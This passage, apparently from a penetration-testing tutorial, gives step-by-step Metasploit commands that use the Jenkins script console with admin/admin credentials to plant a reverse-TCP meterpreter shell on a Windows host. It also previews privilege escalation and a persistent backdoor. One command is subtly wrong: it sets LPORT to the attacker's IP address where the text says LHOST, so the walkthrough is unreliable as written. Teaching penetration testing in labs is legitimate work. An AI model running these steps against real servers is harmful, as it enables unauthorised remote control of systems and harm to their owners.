For this demonstration, we will use Metasploit to exploit the Jenkins server and get a meterpreter shell on it. Jenkins has its own script console where a user can type in and run arbitrary code. This is dangerous if the user's credentials are stolen, as anyone can then run arbitrary code using the script console. The Metasploit module we will be using, takes advantage of this and attempts to run code that would create a connection to the remote machine.

Let's see how the exploitation is done:

1. SSH into the Kali machine and load the Metasploit framework by issuing the following command:

msfconsole

2. Next, we will search Metasploit for any exploits related to Jenkins:

search jenkins

The output of the preceding command is as follows:

We are presented with a number of modules that are related to Jenkins.

3. We will use the jenkins_script_console exploit in this case. Issue the following command:

use exploit/multi/http/jenkins_script_console

4. Let's set up the exploit and configure our target server. Issue the following commands, one by one:

set RHOSTS <<IP Address>>
set RPORT 8080
set USERNAME admin
set PASSWORD admin
set TARGETURI /
set target 0

The target 0 indicates this is a Windows machine.

5. To see a list of all the payloads available, issue the following command:

show payloads

A list of all the payloads will be listed for our perusal:

6. We'll use a reverse TCP payload for this exploit. Since our Windows machine is 64 bit, we'll choose the 64-bit payload to be delivered. Following that, set your LHOST to your Kali IP address:

set payload windows/x64/meterpreter/reverse_tcp
set LPORT <<Kali IP Address>>

Once this is all done, you can issue the show options command to check if all required data have been filled in:

7. Now, simply run the exploit. You will drop into a meterpreter shell:

We have successfully gained shell access to our target machine. In the next section, we will see how to perform privilege escalation and pivoting, as well as make our backdoor persistent.